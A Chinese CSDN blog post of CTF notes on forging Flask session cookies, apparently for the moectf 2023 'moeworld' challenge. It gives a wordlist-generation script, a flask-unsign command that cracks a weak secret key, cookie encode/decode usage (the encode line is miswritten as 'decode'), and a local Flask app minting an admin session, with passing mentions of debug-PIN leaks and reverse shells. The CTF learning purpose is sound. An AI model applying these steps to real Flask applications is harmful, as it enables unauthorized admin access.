session伪造

已于 2023-12-12 19:37:36 修改
阅读量233 收藏
点赞数
文章标签: 前端
于 2023-10-17 18:32:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73847654/article/details/133890259
版权

SESSION 文件保存的目录由 session.save_path 指定,文件名以 sess_ 为前缀,后跟 SESSION ID,如:sess_c72665af28a8b14c0fe11afe3b59b51b。文件中的数据即是序列化之后的 SESSION 数据了 

session伪造     pin泄露console命令

moectf 2023wp moeworld

Interactive Console

在线生成反弹 shell

1)附件里 app.config['SECRET_KEY'] = os.urandom(2).hex()

先生成字典脚本如下:

import itertools
d = itertools.product('0123456789abcdef', repeat=4)
with open('dicts.txt', 'w') as f:
    for i in d:
        s = ''.join(i)
        f.write(s + '\n')

2)报错key flask-unsign 为例

flask-unsign -u -c '.eyJub3RlcyI6e319.ZRaiVg.28tEyvEpXfcjFl5rrQ7K_nkl208' -w dicts.txt
-- no-literal-eval
得到secret-key=18ff

命令使用:

decode
python flask_session_cookie_manager{2,3}.py decode -c [cookie] -s [Secret key]
也可以不加s参数,直接尝试base64解码,如上脚本

encode
python flask_session_cookie_manager{2,3}.py decode -s [Secret key]	-t "[之前解出的字符串]"		//一定要是双引号

3)本地起模拟,获得cookie

#flask server
from flask import Flask, session

app = Flask(__name__)
app.secret_key = 'S3cr3tK3y'
@app.route('/login')
def login():
    # 模拟登录,将用户名和角色存储在会话中
    session['loggedin'] = True
    session['username'] = 'admin'
    session['role'] = 'admin'
    return "登录成功!"

app.run()

El.十一
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
php跨域提交及伪造SeSSION
09-25
一个基于php的跨域提交伪造数据的东东,有待于改进!
Flask之session伪造
TenG的博客
05-22 3807
前言 本文结合CTF中遇到的题目来说一下session伪造,虽然已经有很多师傅写了,而且写的都特别好,但是还是想自己记录一下,也方便以后复习。ciscn中就有一个session伪造的题,由于之前没有做过就没做出来,还是有点遗憾的。但比较戏剧性的是,上午比赛刚结束,下午刷BUU的时候就遇到了同样的题目。嗐,还是自己太菜,下面就结合BUUCTF中的[HCTF 2018]admin来说一下,文中比较拙劣的地方还请师傅们指正一下。参考文章 正文 本来这个题是有三种解法的,分别是:flask session伪造、Un
flask中的session伪造问题
m0_62422842的博客
09-05 2526
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
session,PIN码伪造学习(py flask)
最新发布
oyf3085227433的博客
03-12 1134
学习一下伪造session,PIN码的知识
Flask中的session伪造
m0_60716947的博客
10-18 1120
flask之session伪造
Session伪造记录
qq_49422880的博客
09-05 4435
session与cookie的区别 cookie数据保存在客户端,session数据保存在服务端。 session 简单的说,当你登陆一个网站的时候,如果web服务器端使用的是session,那么所有的数据都保存在服务器上,客户端每次请求服务器的时候会发送当前会话sessionid,服务器根据当前sessionid判断相应的用户数据标志,以确定用户是否登陆或具有某种权限。由于数据是存储在服务器上面,所以你不能伪造。 cookie sessionid是服务器和客户端连接时候随机分配的,如果浏览器使用的是coo
浅谈flask中的session伪造
lukky_的博客
11-19 226
python3 脚本3.py decode -c "session值" -s "key值"python3 脚本3.py encode -s "key值" -t "我们需要伪造的值"flask中的session是存储在客户端的cookie中,flask仅对数据进行签名。flask通过一个secret_key 密钥对数据 进行签名来防止session被篡改。前提 得到session信息 并且 知道flask的签名的SECRET_KEY。知识点 flask的session伪造
技术分享 跨越语言的艺术:Flask Session 伪造
m0_46699477的博客
10-18 209
在白帽汇安全研究院,漏洞检测和利用是一项创造性的工作,我们致力于以最简洁,高效的方式来实现。为了在 Goby 中实现 Flask Session 生成和利用方法,我们花费大量精力去调试 Flask 源码,分析 Session 的构造过程。最终,我们成功在 Go 语言中实现了 Flask Session 校验和生成方法。
flask-session-cookie-manager-master.zip
09-05
CTFsession伪造脚本,有解密和加密的,一定要有私钥才能进行。
通达OA前台伪造管理登陆cookie生成tongda.py
05-07
通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台。
Session-JavaWeb专题
09-05
本课程系统地讲解了SESSION这个知识点,主要讲解了Session的概念,它是如何产生,如何工作,如何存放和如何消亡的,以及Session在JavaWeb中的体现和操作,在最后用一个小例子来演示了如何通过Servlet来操作Session。...
比较全的PHP 会话(session 时间设定)使用入门代码
12-18
对于 Cookie 来说,假设我们要验证用户是否登陆,就必须在 Cookie 中保存用户名和...因为我们并不能 只做一次验证。为什么呢?因为客户端 Cookie 中的信息是有可能被修改的。...错了,假如有人伪造一个值为 tru
N1BOOK 入门session伪造
SopRomeo的博客
12-14 488
爆出网站目录,flag没权限可以读 试下读/proc python 的任意文件读取 由于不知道server.py的路径 可以用/proc/self/cwd来代表路径跳转到当前目录 读到源码 做一下处理 import html python=''' import os from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string ) from flask_s.
flask session伪造
SwBack的博客
07-31 626
通过CTF题目进行学习首先打开题目,查看源代码发下如下注(提)释(示)看到这个,有经验的大佬们估计可以猜到,八成这题就是要伪造admin登录习惯性尝试一波弱口令,admin/admin admin/123456 结果肯定是失败的,随便注册一个账号登录登录,查看页面的功能及源代码,是否存在提示在change页面发现源代码地址看到flask,在根据之前的注释,想到考点应该是flask cookie伪造...
通达前台任意用户session伪造+后台getshell
m_ing
08-27 1145
前言:通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录,包括admin 漏洞影响版本:通达OA < 11.5.200417 版本 准备条件: m_ing是此次利用的poc,目标的url直接写在url.txt中,vuln.txt是输出结果 运行脚本需要python3环境,python m_ing.py时会出现报错需要安装相应的
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 460
[HarekazeCTF2019]Easy Notes(session伪造)
postman伪造session
09-12
在使用Postman进行接口测试时,可以通过在Headers中添加Cookie来伪造Session。具体步骤如下: 1. 打开接口文档,找到要测试的接口,并查看是否需要登录和身份验证。 2. 如果需要登录和身份验证,在Headers中配置请求头信息。其中,Cookie是验证身份的重要依据,需要将Cookie信息填入Headers中。 3. 将Cookie信息填入Headers tab下,如有其他Header参数信息,也需要填入。 4. 点击发送(Send)按钮,观察响应是否符合预期。 通过以上步骤,你可以在Postman中伪造Session来进行接口测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

El.十一

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值